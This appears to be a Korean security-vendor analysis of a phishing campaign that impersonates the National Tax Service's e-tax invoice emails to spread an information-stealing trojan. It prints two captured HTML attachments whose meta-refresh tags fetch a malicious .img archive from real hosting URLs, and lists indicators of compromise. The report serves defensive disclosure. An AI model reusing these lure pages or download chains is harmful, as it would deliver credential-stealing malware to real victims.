국세청 ‘전자세금계산서’ 사칭 악성코드 유포

ASEC 분석팀은 최근 국내 이메일을 통한 악성코드 유포 사례를 모니터링 하던 중, 국세청 전자세금계산서 발급 메일을 사칭하여 정보유출 형 악성코드가 유포 중인것을 확인하였다. 아래의 그림은 공격에 사용된 메일로 국세청에서 정상적으로 특정 사업자에게 발송된 것으로 위장한 것을 알 수 있다. 이메일의 첨부파일은 “NTS_eTaxInvoice.html” 로 스크립트 파일 형식이다.

국세청 사칭 메일내용

해당 HTML 파일을 실행 시, 특정 사이트로 접속하여 2차 악성파일(*.img)을 다운로드 받는 구조이다.

(사례-1)

<HTML xmlns:o = "urn:schemas-microsoft-com:office:office"><HEAD>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<P style="FONT-FAMILY: �s�ө���, Arial; COLOR: rgb(0,0,0); MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 10pt" align=center><IMG border=0 hspace=0 alt=" inquiry" src="https://i.ibb.co/CKzBnpM/Koria-gif1-Untitled.gif"><BR></P>
<META content=1;url=https://cdn.discordapp.com/attachments/737847165568942094/743329581519601754/NTS_eTaxInvoice.img?e=H9iaRf http-equiv=refresh></BODY></HTML>

(사례-2)

<a href="https://gifyu.com/image/c8B5"><img src="https://s7.gifyu.com/images/Korian-Tax-Invoice-direct-link-Image.gif" alt="Korian-Tax-Invoice-direct-link-Image.gif" border="0" /></a>P style="FONT-FAMILY: �s�ө���, Arial; COLOR: rgb(0,0,0); MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 10pt" align=center><IMG border=0 hspace=0 alt=" inquiry" src="https://ibb.co/Gtj1RGw?width=825&height=395"><BR></P>
<META content=1;url=https://1drv.ws/u/s!AmUcc0yrXDZQa9fBEFywhT3Wu1Y?e=nxK818?e=H9iaRf http-equiv=refresh></BODY></HTML>

[다운로드 주소]

  • https[:]//cdn.discordapp.com/attachments/737847165568942094/743329581519601754/NTS_eTaxInvoice.img 
  • https[:]//1drv.ws/u/s!AmUcc0yrXDZQa9fBEFywhT3Wu1Y

스크립트 파일에 의해 다운로드 된 “NTS_eTaxInvoice.img” 파일은 압축형식의 파일로 내부에는 아래의 그림과 같이 PDF 문서로 위장한 실행파일(*.exe)이 존재하며, 해당 파일은 정보유출 기능의 악성코드로 확인되었다.

IMG 압축파일 내부의 실행파일

[유포파일 이름]

  • NTS_eTaxInvoice.exe
  • NTS_eTaxInvoice.scr
  • scan-12-08-2020-New_PO IMG-Updated.exe

최근 국내에는 이러한 국세청을 사칭한 공격 외에도 견적서, 이력서를 가장한 이메일 공격이 활발하게 진행되고 있다. 출처가 불분명한 메일 및 첨부파일에 대해서는 사전에 백신 프로그램을 이용한 검사가 필요하다.

[V3 진단]

  • Downloader/Win32.Agent.C4180520 (엔진버전: 2020.08.14.03)
  • Trojan/Win32.Infostealer.C4182634 (엔진버전: 2020.08.19.00)

[관련 IOC 정보]

  • https[:]//cdn.discordapp.com/attachments/737847165568942094/743329581519601754/NTS_eTaxInvoice.img 
  • https[:]//1drv.ws/u/!AmUcc0yrXDZQa9fBEFywhT3Wu1Y
  • MD5: 9c23c0cc13e4df0fc7d17e54cdfb286b (exe)
  • MD5: 5a1dbe631249d5b4a22f94777ad5b104 (exe)
0 0 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments